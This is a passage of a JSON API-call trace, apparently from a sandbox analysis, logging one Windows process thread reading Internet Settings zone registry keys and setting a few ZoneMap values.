{ "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 547 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 548 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 549 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 550 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 551 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 552 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 553 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "0" } ], "repeated": 0, "id": 554 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e15a7", "parentcaller": "0x764e14c4", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x000003d4" }, { "name": "MutexName", "value": "Local\\ZonesCacheCounterMutex" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 555 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 556 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 557 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00740000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 558 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 559 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 560 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 561 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 562 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 563 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 564 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 565 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 566 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "33" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\Flags" } ], "repeated": 0, "id": 567 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 568 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d8" } ], "repeated": 0, "id": 569 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "1" } ], "repeated": 0, "id": 570 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 571 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 572 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 573 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 574 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 575 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 576 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 577 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 578 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 579 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 580 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "219" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\Flags" } ], "repeated": 0, "id": 581 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 582 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" } ], "repeated": 0, "id": 583 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "ProxyBypass" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "1" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" } ], "repeated": 0, "id": 584 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "IntranetName" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "1" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" } ], "repeated": 0, "id": 585 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "UNCAsIntranet" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "1" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet" } ], "repeated": 0, "id": 586 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x765382c5", "parentcaller": "0x764f1662", "category": "registry", "api": "NtSetValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "AutoDetect" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Buffer", "value": "0" }, { "name": "BufferLength", "value": "4" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" } ], "repeated": 0, "id": 587 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e0" } ], "repeated": 0, "id": 588 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 589 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d8" } ], "repeated": 0, "id": 590 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "2" } ], "repeated": 0, "id": 591 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 592 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 593 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 594 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 595 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 596 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 597 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 598 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 599 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 600 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 601 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "71" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\Flags" } ], "repeated": 0, "id": 602 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 603 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d8" } ], "repeated": 0, "id": 604 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "3" } ], "repeated": 0, "id": 605 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 606 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 607 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 608 }, 